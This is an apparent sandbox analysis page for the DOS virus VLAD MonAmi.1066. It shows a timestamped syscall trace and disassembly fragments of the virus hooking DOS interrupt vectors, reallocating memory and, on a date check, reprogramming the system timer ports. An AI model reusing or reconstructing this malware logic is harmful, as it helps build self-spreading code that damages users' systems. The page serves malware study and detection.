Sample viewer

vx.netlux.org/Virus.DOS.VLAD.MonAmi.1066

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:50:16.88092895Z 74 PC: 12a53 | Reallocate memory
2018-12-17T22:50:16.883412505Z 44 PC: 9f342 | Get time 0x9f342: call 0x9f3b1
0x9f345: mov ax, 0x3521
0x9f348: int 0x21
0x9f34a: push cs
0x9f34b: pop ds
0x9f34c: mov si, 0xc4
0x9f34f: mov word ptr [si + 0x60], bx
0x9f352: nop
0x9f353: mov word ptr [si + 0x62], es
0x9f356: nop
0x9f357: pop es
0x9f358: pop bx
0x9f359: xchg dx, si
0x9f35b: mov ah, 0x25
0x9f35d: int 0x21
0x9f35f: dec bx
0x9f360: je 0x9f3ad
0x9f362: mov ah, 0x4a
0x9f364: int 0x21
0x9f366: mov ax, cs
2018-12-17T22:50:16.886981512Z 53 PC: 9f34a | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:50:16.888724081Z 37 PC: 9f35f | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:50:16.890549298Z 74 PC: 9f366 | Reallocate memory
2018-12-17T22:50:16.894382384Z 42 PC: 9f377 | Get date 0x9f377: or al, al
0x9f379: jne 0x9f3ad
0x9f37b: mov ax, 0x34
0x9f37e: out 0x43, ax
0x9f380: mov ax, 0x11
0x9f383: out 0x40, ax
0x9f385: jmp 0x9f3ad
0x9f387: nop
0x9f388: pop bx
0x9f389: dec bp
0x9f38a: outsw dx, word ptr [si]
0x9f38b: outsb dx, byte ptr [si]
0x9f38c: and byte ptr [bx + di + 0x6d], ah
0x9f38f: imul sp, word ptr [bx + si], 0x616c
0x9f393: and byte ptr [bx + si + 0x65], dh
0x9f396: outsb dx, byte ptr [si]
0x9f397: jne 0x9f406
0x9f39a: pop bp
0x9f39c: and byte ptr [di], ch
0x9f39e: and byte ptr [di + 0x65], cl